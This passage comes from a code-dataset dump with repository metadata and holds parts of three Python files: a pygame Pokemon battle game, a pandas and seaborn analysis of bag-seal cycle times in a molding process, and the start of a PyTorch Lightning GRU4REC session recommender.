1\r\n\t\t\t\t\t\treturn\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\t#print(\"mons fainted\")\r\n\t\t\t\t\t\tself.state = 0\r\n\t\t\t\t\t\tself.poke1 = 0\r\n\t\t\t\t\t\tself.poke2 = 
0\r\n\t\t\t\t\t\tprint(self.state)\r\n\t\t\t\t\t\treturn\r\n\r\n\t\t\t\tself.poke2 = 0\r\n\t\t\t\tself.poke1 = 1\r\n\t\t\t\tself.turns += 1\r\n\t\t\t\treturn\r\n\r\n\t\t\tif self.cpuWin == 1:\r\n\t\t\t\t#print(\"You ded cpu win\")\r\n\t\t\t\tself.end = 2\r\n\r\n\t\t\tif self.userWin == 1:\r\n\t\t\t\t#print(\"you killed pokeman woo yay\")\r\n\t\t\t\tself.end = 1\r\n\r\n\t\treturn self.end\r\n\r\nclass Select: # choose a party of 3 pokemon\r\n\tdef __init__(self):\r\n\t\tself.bp = [False, False, False, False, False, False]\r\n\t\tself.selection = []\r\n\r\n\tdef choseMon(self, key):\r\n\t\tif len(self.selection) == 3:\r\n\t\t\treturn self.selection\r\n\r\n\t\tif key[pygame.K_1] and not self.bp[0]: # makes sure you don't press the same button twice\r\n\t\t\tself.bp[0] = True\r\n\t\t\tself.selection.append(0) # add the index of pokemon\r\n\r\n\t\tif key[pygame.K_2] and not self.bp[1]:\r\n\t\t\tself.bp[1] = True\r\n\t\t\tself.selection.append(1)\r\n\r\n\t\tif key[pygame.K_3] and not self.bp[2]:\r\n\t\t\tself.bp[2] = True\r\n\t\t\tself.selection.append(2)\r\n\r\n\t\tif key[pygame.K_4] and not self.bp[3]:\r\n\t\t\tself.bp[3] = True\r\n\t\t\tself.selection.append(3)\r\n\r\n\t\tif key[pygame.K_5] and not self.bp[4]:\r\n\t\t\tself.bp[4] = True\r\n\t\t\tself.selection.append(4)\r\n\r\n\t\tif key[pygame.K_6] and not self.bp[5]:\r\n\t\t\tself.bp[5] = True\r\n\t\t\tself.selection.append(5)\r\n\r\n\t\treturn [0]", "repo_name": "Nikhil6767/Games", "sub_path": "Pokemon_Project/Classes.py", "file_name": "Classes.py", "file_ext": "py", "file_size_in_byte": 22249, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pygame.Surface", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.SRCALPHA", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 53, "usage_type": "call"}, {"api_name": "pygame.SRCALPHA", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 69, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 69, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 93, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 93, "usage_type": "attribute"}, {"api_name": "pygame.transform.smoothscale", "line_number": 101, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 101, "usage_type": "attribute"}, {"api_name": "pygame.transform.rotate", "line_number": 104, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 208, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 208, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 209, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 217, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 217, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 218, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 223, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 223, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 224, "usage_type": "call"}, {"api_name": "pygame.K_1", "line_number": 297, "usage_type": "attribute"}, {"api_name": 
"pygame.K_2", "line_number": 301, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 322, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 322, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 323, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 330, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 330, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 331, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 342, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 342, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 343, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 351, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 358, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 358, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 359, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 404, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 410, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 410, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 411, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 424, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 424, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 425, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 429, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 437, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 437, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 438, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 444, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 463, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 463, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 464, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 516, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 516, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 517, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 536, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 536, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 537, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 544, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 544, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 545, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 549, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 556, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 556, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 557, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 604, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 604, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 605, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 617, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 617, "usage_type": "attribute"}, 
{"api_name": "time.sleep", "line_number": 618, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 622, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 630, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 630, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 631, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 654, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 654, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 655, "usage_type": "call"}, {"api_name": "pygame.K_1", "line_number": 700, "usage_type": "attribute"}, {"api_name": "pygame.K_2", "line_number": 704, "usage_type": "attribute"}, {"api_name": "pygame.K_3", "line_number": 708, "usage_type": "attribute"}, {"api_name": "pygame.K_4", "line_number": 712, "usage_type": "attribute"}, {"api_name": "pygame.K_5", "line_number": 716, "usage_type": "attribute"}, {"api_name": "pygame.K_6", "line_number": 720, "usage_type": "attribute"}]}
+{"seq_id": "15728272050", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 1 14:56:00 2023\n\n@author: Ryan.Larson\n\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\nfrom scipy import stats\nimport statsmodels.stats.api as sms\nimport resin_ttest_experiments as rtt\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib.cbook import boxplot_stats\n\n\nkeys = [\"green\", \"orange\", \"pink\", \"red\", \"purple\", \"brown\"]\n\ndef step_1():\n file_list = [\"green.csv\", \"orange.csv\", \"pink.csv\", \"red.csv\", \"purple.csv\", \"brown.csv\"]\n \n mold_dfs = {key: None for key in keys}\n \n \n dropcols = [\"Leak Time\", \"Leak Count\", \"Parts Count\", \"Weekly Count\",\n \"Monthly Count\", \"Trash Count\", \"Lead\", \"Assistant 1\", \"Assistant 2\",\n \"Assistant 3\"]\n \n \n for file in file_list:\n color = file.replace(\".csv\",\"\")\n df = pd.read_csv(file)\n \n # Deal with time column\n df[\"time\"] = pd.to_datetime(df[\"time\"])\n df[\"Date\"] = pd.to_datetime(df[\"time\"]).dt.date\n df.drop(\"time\",axis=1,inplace=True)\n first_column = df.pop(\"Date\")\n df.insert(0,\"Date\", first_column)\n \n for col in dropcols:\n df = df.drop(col,axis=1)\n df = df.dropna(how=\"all\")\n for column in df.columns:\n df = df[df[column] != 0]\n \n mold_dfs[color] = df\n \n df.to_csv(\"{}2.csv\".format(color),index=False)\n # df = df.dropna(axis=0)\n # df.to_csv(bag, index=False)\n \n return mold_dfs\n \n\ndef step_2():\n \"\"\"\n \n\n Returns\n -------\n None.\n\n \"\"\"\n file_list = [\"green2.csv\", \"orange2.csv\", \"pink2.csv\", \"red2.csv\", \"purple2.csv\", \"brown2.csv\"]\n \n for i,file in enumerate(file_list):\n if i == 0:\n df_all = pd.read_csv(file)\n else:\n df = pd.read_csv(file)\n df_all = pd.concat([df_all, df], axis=0, ignore_index=True)\n \n df_all.dropna(axis=0,inplace=True)\n \n return df_all\n\n\ndef filter_saturated(df):\n df = df[df[\"Layup Time\"] != 276]\n df = df[df[\"Layup Time\"] != 275]\n df = df[df[\"Close Time\"] != 90]\n df = df[df[\"Resin Time\"] != 180]\n df.drop_duplicates(inplace=True)\n return df\n \n # mold_dfs = {key: None for key in keys}\n \n # for file in file_list:\n # color = file.replace(\"2.csv\",\"\")\n # df = pd.read_csv(file)\n # df = df[df[\"Layup Time\"] != 276]\n # df = df[df[\"Layup Time\"] != 275]\n # df = df[df[\"Close Time\"] != 90]\n # df = df[df[\"Resin Time\"] != 180]\n \n # # Remove duplicates\n # df.drop_duplicates(inplace=True)\n \n # mold_dfs[color] = df\n \n # df.to_csv(\"{}3.csv\".format(color),index=False)\n \n \n# alldata = pd.concat(frames)\n\n# feature_vals = list(alldata[\"Bag\"].unique())\n# n_feature_vals = len(feature_vals)\n\n# df_features = [alldata.where(alldata[\"Bag\"] == feature_val) for feature_val in feature_vals]\n# df_features = [df_feature.dropna(axis=0) for df_feature in df_features]\n\n\n# # rtt.oneway_anova(df_features, \"Cycle Time\")\n\n# rtt.find_stat_difference_2group(df_features[0], df_features[1], \"Resin Time\")\n# # rtt.find_stat_difference_2group(df_features[0], df_features[1], \"Cycle Time\")\n\n\nif __name__ == \"__main__\":\n # mold_dfs = step_1()\n df_all = step_2()\n \n df10 = df_all[df_all[\"Bag\"]==10.0]\n df11 = df_all[df_all[\"Bag\"]==11.0]\n df12 = df_all[df_all[\"Bag\"]==12.0]\n df13 = df_all[df_all[\"Bag\"]==13.0]\n df14 = df_all[df_all[\"Bag\"]==14.0]\n df15 = df_all[df_all[\"Bag\"]==15.0]\n df16 = df_all[df_all[\"Bag\"]==16.0]\n \n df10_filtered = filter_saturated(df10)\n df11_filtered = filter_saturated(df11)\n df12_filtered = 
filter_saturated(df12)\n df13_filtered = filter_saturated(df13)\n df14_filtered = filter_saturated(df14)\n df15_filtered = filter_saturated(df15)\n df16_filtered = filter_saturated(df16)\n df_all_filtered = filter_saturated(df_all)\n \n df10_no_outliers = df10_filtered.copy()\n df11_no_outliers = df11_filtered.copy()\n df12_no_outliers = df12_filtered.copy()\n df13_no_outliers = df13_filtered.copy()\n df14_no_outliers = df14_filtered.copy()\n df15_no_outliers = df15_filtered.copy()\n df16_no_outliers = df16_filtered.copy()\n \n ## Filter out outliers for each bag ##\n df_no_outliers_list = [df10_no_outliers, df11_no_outliers, df12_no_outliers, df13_no_outliers, df14_no_outliers, df15_no_outliers, df16_no_outliers]\n \n for i,df in enumerate(df_no_outliers_list):\n layup_stats = boxplot_stats(list(df[\"Layup Time\"]))[0]\n resin_stats = boxplot_stats(list(df[\"Resin Time\"]))[0]\n close_stats = boxplot_stats(list(df[\"Close Time\"]))[0]\n cycle_stats = boxplot_stats(list(df[\"Cycle Time\"]))[0]\n \n layup_conditions = [(df[\"Layup Time\"] > layup_stats[\"whishi\"]) | (df[\"Layup Time\"] < layup_stats[\"whislo\"])]\n close_conditions = [(df[\"Close Time\"] > close_stats[\"whishi\"]) | (df[\"Close Time\"] < close_stats[\"whislo\"])]\n resin_conditions = [(df[\"Resin Time\"] > resin_stats[\"whishi\"]) | (df[\"Resin Time\"] < resin_stats[\"whislo\"])]\n cycle_conditions = [(df[\"Cycle Time\"] > cycle_stats[\"whishi\"]) | (df[\"Cycle Time\"] < cycle_stats[\"whislo\"])]\n \n df[\"Layup Outlier\"] = np.transpose(np.where(layup_conditions, True, False))\n df[\"Close Outlier\"] = np.transpose(np.where(close_conditions, True, False))\n df[\"Resin Outlier\"] = np.transpose(np.where(resin_conditions, True, False))\n df[\"Cycle Outlier\"] = np.transpose(np.where(cycle_conditions, True, False))\n \n \n df_all_no_outliers = pd.concat([df10_no_outliers, df11_no_outliers])\n df_all_no_outliers = pd.concat([df_all_no_outliers, df12_no_outliers])\n df_all_no_outliers = pd.concat([df_all_no_outliers, df13_no_outliers])\n df_all_no_outliers = pd.concat([df_all_no_outliers, df14_no_outliers])\n df_all_no_outliers = pd.concat([df_all_no_outliers, df15_no_outliers])\n df_all_no_outliers = pd.concat([df_all_no_outliers, df16_no_outliers])\n \n df_all_layup_filtered = df_all_no_outliers[df_all_no_outliers[\"Layup Outlier\"] == False]\n df_all_close_filtered = df_all_no_outliers[df_all_no_outliers[\"Close Outlier\"] == False]\n df_all_resin_filtered = df_all_no_outliers[df_all_no_outliers[\"Resin Outlier\"] == False]\n df_all_cycle_filtered = df_all_no_outliers[df_all_no_outliers[\"Cycle Outlier\"] == False]\n \n sns.set(rc={\"figure.dpi\":300, \"figure.figsize\":(15.0, 8.27)})\n sns.set_style(\"whitegrid\")\n palette_str = \"Paired\"\n \n ### Bag Days as x\n # Layup Time\n plt.figure()\n sns.relplot(data=df_all_layup_filtered, x=\"Bag Days\", y=\"Layup Time\", hue=\"Bag\", palette=palette_str)\n plt.title(\"Age Effects on Layup Time\")\n \n # Close Time\n plt.figure()\n sns.relplot(data=df_all_close_filtered, x=\"Bag Days\", y=\"Close Time\", hue=\"Bag\", palette=palette_str)\n plt.title(\"Age Effects on Close Time\")\n \n # Resin Time\n plt.figure()\n sns.relplot(data=df_all_resin_filtered, x=\"Bag Days\", y=\"Resin Time\", hue=\"Bag\", palette=palette_str)\n plt.title(\"Age Effects on Resin Time\")\n \n # Cycle Time\n plt.figure()\n sns.relplot(data=df_all_cycle_filtered, x=\"Bag Days\", y=\"Cycle Time\", hue=\"Bag\", palette=palette_str)\n plt.title(\"Age Effects on Cycle Time\")\n \n ### Bag Cycles as x\n # 
Layup Time\n plt.figure()\n sns.relplot(data=df_all_layup_filtered, x=\"Bag Cycles\", y=\"Layup Time\", hue=\"Bag\", palette=palette_str)\n plt.title(\"Age Effects on Layup Time\")\n \n # Close Time\n plt.figure()\n sns.relplot(data=df_all_close_filtered, x=\"Bag Cycles\", y=\"Close Time\", hue=\"Bag\", palette=palette_str)\n plt.title(\"Age Effects on Close Time\")\n \n # Resin Time\n plt.figure()\n sns.relplot(data=df_all_resin_filtered, x=\"Bag Cycles\", y=\"Resin Time\", hue=\"Bag\", palette=palette_str)\n plt.title(\"Age Effects on Resin Time\")\n \n # Cycle Time\n plt.figure()\n sns.relplot(data=df_all_cycle_filtered, x=\"Bag Cycles\", y=\"Cycle Time\", hue=\"Bag\", palette=palette_str)\n plt.title(\"Age Effects on Cycle Time\")\n \n ### Boxplot by bag for overall differences\n # Layup Time\n plt.figure()\n ax = sns.boxplot(data=df_all_layup_filtered, x=\"Bag\", y=\"Layup Time\", palette=palette_str)\n medians = df_all_layup_filtered.groupby(['Bag'])['Layup Time'].median().values\n nobs = df_all_layup_filtered['Bag'].value_counts().values\n nobs = [str(x) for x in nobs.tolist()]\n nobs = [\"n: \" + i for i in nobs]\n pos = range(len(nobs))\n for tick,label in zip(pos,ax.get_xticklabels()):\n ax.text(pos[tick],\n medians[tick] + 0.04,\n nobs[tick],\n horizontalalignment='center',\n size='small',\n color='w',\n weight='semibold')\n \n # Close Time\n plt.figure()\n ax = sns.boxplot(data=df_all_close_filtered, x=\"Bag\", y=\"Close Time\", palette=palette_str)\n medians = df_all_close_filtered.groupby(['Bag'])['Close Time'].median().values\n nobs = df_all_close_filtered['Bag'].value_counts().values\n nobs = [str(x) for x in nobs.tolist()]\n nobs = [\"n: \" + i for i in nobs]\n pos = range(len(nobs))\n for tick,label in zip(pos,ax.get_xticklabels()):\n ax.text(pos[tick],\n medians[tick] + 0.04,\n nobs[tick],\n horizontalalignment='center',\n size='small',\n color='w',\n weight='semibold')\n \n # Resin Time\n plt.figure()\n ax = sns.boxplot(data=df_all_resin_filtered, x=\"Bag\", y=\"Resin Time\", palette=palette_str)\n medians = df_all_resin_filtered.groupby(['Bag'])['Resin Time'].median().values\n nobs = df_all_resin_filtered['Bag'].value_counts().values\n nobs = [str(x) for x in nobs.tolist()]\n nobs = [\"n: \" + i for i in nobs]\n pos = range(len(nobs))\n for tick,label in zip(pos,ax.get_xticklabels()):\n ax.text(pos[tick],\n medians[tick] + 0.04,\n nobs[tick],\n horizontalalignment='center',\n size='small',\n color='w',\n weight='semibold')\n \n # Cycle Time\n plt.figure()\n ax = sns.boxplot(data=df_all_cycle_filtered, x=\"Bag\", y=\"Cycle Time\", palette=palette_str)\n medians = df_all_cycle_filtered.groupby(['Bag'])['Cycle Time'].median().values\n nobs = df_all_cycle_filtered['Bag'].value_counts().values\n nobs = [str(x) for x in nobs.tolist()]\n nobs = [\"n: \" + i for i in nobs]\n pos = range(len(nobs))\n for tick,label in zip(pos,ax.get_xticklabels()):\n ax.text(pos[tick],\n medians[tick] + 0.04,\n nobs[tick],\n horizontalalignment='center',\n size='small',\n color='w',\n weight='semibold')\n \n ", "repo_name": "rockwell-window-wells/random-projects", "sub_path": "Silicone_Seals/bag_seal_cycle_analysis.py", "file_name": "bag_seal_cycle_analysis.py", "file_ext": "py", "file_size_in_byte": 10876, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 35, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 38, "usage_type": "call"}, {"api_name": 
"pandas.to_datetime", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 72, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 74, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.cbook.boxplot_stats", "line_number": 156, "usage_type": "call"}, {"api_name": "matplotlib.cbook.boxplot_stats", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.cbook.boxplot_stats", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.cbook.boxplot_stats", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 169, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 172, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 173, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 174, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 175, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 176, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 177, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 184, "usage_type": "call"}, {"api_name": "seaborn.set_style", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 190, "usage_type": "name"}, {"api_name": "seaborn.relplot", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 192, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "seaborn.relplot", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "seaborn.relplot", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "seaborn.relplot", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 211, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 211, "usage_type": 
"name"}, {"api_name": "seaborn.relplot", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 216, "usage_type": "name"}, {"api_name": "seaborn.relplot", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 218, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 221, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 221, "usage_type": "name"}, {"api_name": "seaborn.relplot", "line_number": 222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 226, "usage_type": "name"}, {"api_name": "seaborn.relplot", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 232, "usage_type": "name"}, {"api_name": "seaborn.boxplot", "line_number": 233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 249, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 249, "usage_type": "name"}, {"api_name": "seaborn.boxplot", "line_number": 250, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 266, "usage_type": "name"}, {"api_name": "seaborn.boxplot", "line_number": 267, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 283, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 283, "usage_type": "name"}, {"api_name": "seaborn.boxplot", "line_number": 284, "usage_type": "call"}]}
+{"seq_id": "12713685719", "text": "import math\nimport warnings\nfrom functools import partial\n\nimport pytorch_lightning as pl\nimport torch\nfrom torch import concat, nn, tensor\n\nfrom src.shared.evaluate import validate_batch_per_timestamp\nfrom src.shared.loss import (bce_loss, bpr_max_loss, calc_loss,\n sampled_softmax_loss)\n\n\ndef sparse_output(item_lookup, bias_lookup, output, items_to_predict):\n embeddings = item_lookup(items_to_predict)\n logits = torch.matmul(embeddings, output.t())\n bias = bias_lookup(items_to_predict).squeeze(1)\n return bias + logits.t()\n\n\ndef dense_output(linear_layer, output, items_to_predict):\n return linear_layer(output)[:, items_to_predict.view(-1)]\n\n\ndef clean_state(curr_state, keep_state):\n return curr_state * keep_state\n\nclass GRU4REC(pl.LightningModule):\n\n def __init__(self,\n hidden_size,\n dropout_rate,\n num_items,\n batch_size,\n sampling_style=\"batchwise\",\n topk_sampling=False,\n topk_sampling_k=1000,\n learning_rate=0.001,\n num_layers=1,\n loss='bce',\n bpr_penalty=None,\n optimizer='adagrad',\n output_bias=False,\n share_embeddings=True,\n original_gru=False,\n final_activation=True):\n super(GRU4REC, self).__init__()\n self.num_items = num_items\n self.learning_rate = learning_rate\n self.hidden_size = hidden_size\n self.num_layers = num_layers\n self.dropout_hidden = dropout_rate\n self.batch_size = batch_size\n self.sampling_style = sampling_style\n if sampling_style == \"eventwise\":\n warnings.warn(\"Warning eventwise is not supported and is set to sessionwise ...\")\n self.sampling_style = sampling_style\n self.output_bias = output_bias\n self.share_embeddings = share_embeddings\n self.original_gru = original_gru\n\n if original_gru:\n warnings.warn(\"Warning gru original cannot share input and output embeddings, share embedding is set to False\")\n self.share_embeddings = False\n\n if output_bias and share_embeddings:\n self.item_embedding = nn.Embedding(num_items + 1, hidden_size + 1, padding_idx=0)\n elif self.original_gru:\n self.item_embedding = nn.Embedding(num_items + 1, 3 * hidden_size, padding_idx=0)\n else:\n self.item_embedding = nn.Embedding(num_items + 1, hidden_size, padding_idx=0)\n\n if share_embeddings:\n self.output_embedding = self.item_embedding\n elif (not share_embeddings) and output_bias:\n self.output_embedding = nn.Embedding(num_items + 1, hidden_size + 1, padding_idx=0)\n else:\n self.output_embedding = nn.Embedding(num_items + 1, hidden_size, padding_idx=0)\n\n torch.nn.init.xavier_uniform_(self.item_embedding.weight.data, gain=1 / math.sqrt(6))\n torch.nn.init.xavier_uniform_(self.output_embedding.weight.data, gain=1 / math.sqrt(6))\n\n self.gru = nn.GRU(int(3 * self.hidden_size) if self.original_gru else self.hidden_size,\n self.hidden_size,\n self.num_layers,\n dropout=self.dropout_hidden,\n batch_first=True)\n if final_activation:\n self.final_activation = nn.ELU(0.5)\n else:\n self.final_activation = nn.Identity()\n\n if self.original_gru:\n self.gru.weight_ih_l0 = nn.Parameter(data=torch.eye(3 * self.hidden_size), requires_grad=False)\n self.register_buffer('current_state', torch.zeros([num_layers, batch_size, hidden_size], device=self.device))\n self.register_buffer('loss_mask', torch.ones(1, self.batch_size, device=self.device))\n self.register_buffer('bias_ones', torch.ones([self.batch_size, 1, 1]))\n self.loss_fn = loss\n if self.loss_fn == 'bce':\n self.loss = bce_loss\n elif self.loss_fn == 'ssm':\n self.loss = sampled_softmax_loss\n elif self.loss_fn == 'bpr-max':\n if 
bpr_penalty is not None:\n self.loss = partial(bpr_max_loss, bpr_penalty)\n else:\n raise ValueError('bpr_penalty must be provided for bpr_max loss')\n else:\n raise ValueError('Loss function not supported')\n\n self.topk_sampling = topk_sampling\n self.topk_sampling_k = topk_sampling_k\n self.optimizer = optimizer\n self.save_hyperparameters()\n\n def forward(self, item_indices, in_state, keep_state):\n embedded = self.item_embedding(item_indices.unsqueeze(1))\n embedded = embedded[:, :, :-1] if self.output_bias and self.share_embeddings else embedded\n in_state = clean_state(in_state, keep_state)\n gru_output, out_state = self.gru(embedded, in_state)\n scores = concat([gru_output, self.bias_ones], dim=-1) if self.output_bias else gru_output\n return scores, out_state\n\n def training_step(self, batch, _):\n x_hat, c_state = self.forward(batch[\"clicks\"], self.current_state, batch[\"keep_state\"])\n\n self.current_state = c_state.detach()\n train_loss = calc_loss(self.loss, x_hat, batch[\"labels\"], batch[\"uniform_negatives\"], batch[\"in_batch_negatives\"],\n batch[\"mask\"], self.output_embedding, self.sampling_style, self.final_activation,\n self.topk_sampling, self.topk_sampling_k, self.device)\n\n self.log(\"train_loss\", train_loss)\n\n return train_loss\n\n def validation_step(self, batch, _batch_idx):\n x_hat, self.current_state = self.forward(batch[\"clicks\"], self.current_state, batch[\"keep_state\"])\n cut_offs = tensor([5, 10, 20], device=self.device)\n recall, mrr = validate_batch_per_timestamp(batch, x_hat, self.output_embedding, cut_offs)\n test_loss = calc_loss(self.loss, x_hat, batch[\"labels\"], batch[\"uniform_negatives\"], batch[\"in_batch_negatives\"],\n batch[\"mask\"], self.output_embedding, self.sampling_style, self.final_activation,\n self.topk_sampling, self.topk_sampling_k, self.device)\n for i, k in 